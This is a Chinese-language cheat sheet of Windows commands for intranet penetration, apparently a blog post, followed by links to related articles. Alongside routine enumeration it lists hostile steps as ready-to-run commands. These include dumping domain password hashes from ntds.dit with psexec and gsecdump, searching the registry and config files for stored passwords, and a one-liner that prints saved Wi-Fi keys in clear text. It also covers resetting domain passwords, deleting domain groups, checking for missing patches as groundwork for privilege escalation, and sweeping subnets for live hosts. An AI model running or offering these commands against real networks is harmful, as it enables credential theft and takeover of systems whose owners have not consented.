Windows下内网渗透常用命令总结
域内信息收集常用命令
net group /domain //获得所有域用户组列表
net group zzh /domain //显示域中zzh组的成员
net group zzh /del /domain //删除域中zzh组
net group zzh andy /del /domain //删除域内zzh 群组中的成员
andy net group zzh /add /domain //增加zzh域中的群组
net group "domain admins" /domain //获得域管理员列表
net group "enterprise admins" /domain //获得企业管理员列表
net localgroup administrators /domain //获取域内置administrators组用
(enterprise admins、domain admins) net group "domain controllers" /domain //获得域控制器列表
net group "domain computers" /domain //获得所有域成员计算机列表
net user /domain //获得所有域用户列表
net user someuser /domain //获得指定账户someuser的详细信息
net accounts /domain //获得域密码策略设置,密码长短,错误锁定等信息
net view /domain //查询有几个域, 查询域列表
net view /domain:testdomain //查看 testdomain域中的计算机列表
nltest /domain_trusts //获取域信任信息
net user domain-admin /domain //查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息
net config Workstation //查询机器属于哪个域
net time /domian //查询主域服务器的时间
echo %logonserver% //查看登陆到这台服务器的计算机名
net time \\192.168.50.1 //查询远程共享主机192.168.50.1的时间
net use \\IP\ipc$ password /user:username@domain //ipc$域内连接,拿下文服的时候,可以结合菜刀去建立ipc连接,然后下载和阅读想要的文件
net view \\dc1.zzhsec.com //查看域控共享情况
dir \\dc1.zzhsec.com\SYSVOL /s /a > sysvol.txt //列出sysvol日志记录
xcopy \\dc1.zzhsec.com\sysvol.txt sysvol.txt /i /e /c //远程拷贝到本地sysvol日志
net user /domain zzh 123.qwe //修改域内用户密码,需要管理员权限
mstsc /admin //远程桌面登录到console会话解决hash无法抓出问题
gpupdate/force //更新域策略
psexec \\192.168.50.3 -u administrator -p zzh1234 -c gsecdump.exe -u //从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来
gsecdump -a //获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值
tasklist /S ip /U domain\username /P /V //查看远程计算机进程列
基本操作常用命令
ipconfig/all //查看IP地址
ipconfig /release //释放地址
ipconfig /renew 重新获取Ip地址
whoami //查询账号所属权限
systeminfo //查询系统以及补丁信息
tasklist /svc //查看进程
taskkill /im 进程名称
(cmd) //结束进程
taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)
wmic qfe get hotfixid //查看已安装过得补丁,这个很实用
wmic qfe list full /format:htable > hotfixes.htm //详细的补丁安装
wmic qfe //查询补丁信息以及微软提供的下载地址 ping hostname(主机名) //显示该机器名的IP
query user //查看管理员最近登陆时间
net start //查看当前运行的服务
net user //查看本地组的用户
net localhroup administrators //查看本机管理员组有哪些用户
net use //查看会话
net session //查看当前会话
net share //查看SMB指向的路径[即共享]
wmic share get name,path //查看SMB指向的路径
wmic nteventlog get path,filename,writeable //查询系统日志文件存储位置
net use \\IP\ipc$ password /user:username //建立IPC会话(工作组模式)
net use z: \\192.168.50.1 //建立映射到本机Z盘
netstat -ano //查看开放的端口
netstat -an | find “3389” //找到3389端口
net accounts //查看本地密码策略
nbtstat –A ip //netbiso查询
net view //查看机器注释或许能得到当前活动状态的机器列表,如果禁用netbios就查看不出来
echo %PROCESSOR_ARCHITECTURE% //查看系统是32还是64位 set //查看系统环境设置变量 net start //查看当前运行的服务
wmic service list brief //查看进程服务
wmic process list brief //查看进程
wmic startup list brief //查看启动程序信息
wmic product list brief //查看安装程序和版本信息(漏洞利用线索)
wmic startup list full //识别开机启动的程序
wmic process where(description="mysqld.exe") >> mysql.log //获取软件安装路径
qwinsta //查看登录情况
windows未打补丁情况,
set KB2829361=MS13-046&set KB2830290=MS13-046&set KB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&set KB3077657=MS15-077&set KB3045171=MS15-051&set KB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&set KB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280) do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f /q /a a.txt //windows未打补丁情况,
为提权做准备 REG query HKCU /v "pwd" /s //获取保存到注册表中的密码
探索内网网络结构命令
tracert IP //路由跟踪
route print //打印路由表
arp -a //列出本网段内所有活跃的IP地址
arp -s (ip + MAC)//绑定mac与ip地址
arp -d (ip + MAC) //解绑mac与ip地址
nbtscan -r 192.168.16.0/24 //通过小工具nbtscan扫描整个网络
netsh firewall show config //查看防火墙策略
netsh firewall show state //查看防火墙策略
查找文件位置命令
dir /b/s config.* //查看所在目录所有config.为前缀的文件
dir /b/s *.config //查看所在目录所有config.为后缀的文件
findstr /si password *.xml *.ini *.txt //查看后缀名文件中含有password关键字的文件
findstr /si login *.xml *.ini *.txt //查看后缀名文件中含有login关键字的文件
copy con ftp.bat //创建ftp.bat批处理,然后输入ifconfig等命令,按ctr+z退出,并创建成功 copy con test.vbs //创建test.vbs脚本,输入脚本后,按ctr+z退出,并创建成功
内网探测小脚本
//一键获取wifi密码 for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
//查看是否支持posershell if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)
//批量扫描内网存活主机 for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"
//域机器对应 IP FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)
//C段查找 for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Ping"
//B段查找 for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Ping"
Windows下内网渗透常用命令总结的更多相关文章
- windows下安装RabbitMq和常用命令
----RabbitMq安装-----windows下安装:(1)首先windows下安装好了erlang和rabbitmq.如下地址同时下载和安装:Erlang:http://www.erlang. ...
- windows下使用kafka的常用命令
参考文档: https://blog.csdn.net/evankaka/article/details/52421314 http://orchome.com/6 1 启动zookeeper cmd ...
- [源码]Python简易http服务器(内网渗透大文件传输含下载命令)
Python简易http服务器源码 import SimpleHTTPServerimport SocketServerimport sysPORT = 80if len(sys.argv) != 2 ...
- windows内网渗透技巧
1.(windows)无扫描器情况下内网存活主机探测: for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "t ...
- 7.内网渗透之windows认证机制
文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域 ...
- 内网渗透之Windows认证(二)
title: 内网渗透之Windows认证(二) categories: 内网渗透 id: 6 key: 域渗透基础 description: Windows认证协议 abbrlink: d6b7 d ...
- 内网渗透 - 提权 - Windows
MS提权 MS16- MS16- 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫 ...
- 内网渗透测试思路-FREEBUF
(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...
- metasploit渗透测试笔记(内网渗透篇)
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...
随机推荐
- 【算法随记五】使用FFT变换自动去除图像中严重的网纹。
这个课题在很久以前就已经有所接触,不过一直没有用代码去实现过.最近买了一本<机器视觉算法与应用第二版>书,书中再次提到该方法:使用傅里叶变换进行滤波处理的真正好处是可以通过使用定制的滤波器 ...
- gitblit在windows10上的安装及服务启动报错处理
折腾一下午算是装好了,心情不错决定分享一下.安装步骤大同小异网上都有,主要是Failed creating java 这个报错,百度出来的没有一个能给我解决的,摸索半天找出一个自己的方式.为报错而来的 ...
- [LeetCode] 1108. Defanging an IP Address
Description Given a valid (IPv4) IP address, return a defanged version of that IP address. A defange ...
- Object.keys方法详解
一.官方解释 Object.keys() 方法会返回一个由一个给定对象的自身可枚举属性组成的数组,数组中属性名的排列顺序和使用 for...in 循环遍历该对象时返回的顺序一致 .如果对象的键-值都不 ...
- 基于.NET环境,C#语言 实现 TCP NAT
基于.NET平台和C#语言实现TCP NAT穿越 1.<C# WinForm 跨线程访问控件(实用简洁写法)> 2.<基于.NET环境,C#语言 实现 TC ...
- 年薪500K工程师告诉你,python都能用来做什么?
一提到python,大家脑袋中都会想到「数据分析」.「爬虫」.「人工智能」这些词. 其实python并没有像如上所说的这样「专业」.「高深」的应用,对于初学者来说更是可以从一些超简单又有趣的小项目开始 ...
- Node Sass could not find a binding for your current environment: OS X 64-bit with Node.js 10.x
运行Reac项目报: Node Sass could not find a binding for your current environment: OS X 64-bit with Node.js ...
- 0基础学Java快速扫盲指南,月入2W的基础
学Java,掌握一些基本的概念是第一步,本文简单为大家介绍一些扫盲级别的内容,希望帮助小白快速入门. 一.基本概念 JVM:java虚拟机,负责将编译产生的字节码转换为特定机器代码,实现一次编译多处执 ...
- [BZOJ29957] 楼房重建 - 线段树
2957: 楼房重建 Time Limit: 10 Sec Memory Limit: 256 MBSubmit: 3294 Solved: 1554[Submit][Status][Discus ...
- NodeJs编写Cli实现自动初始化新项目目录结构
应用场景 前端日常开发中,会遇见各种各样的cli,这些工具极大地方便了我们的日常工作,让计算机自己去干繁琐的工作,而我们,就可以节省出大量的时间用于学习.交流.开发. 注释:文章附有源码链接! 使用工 ...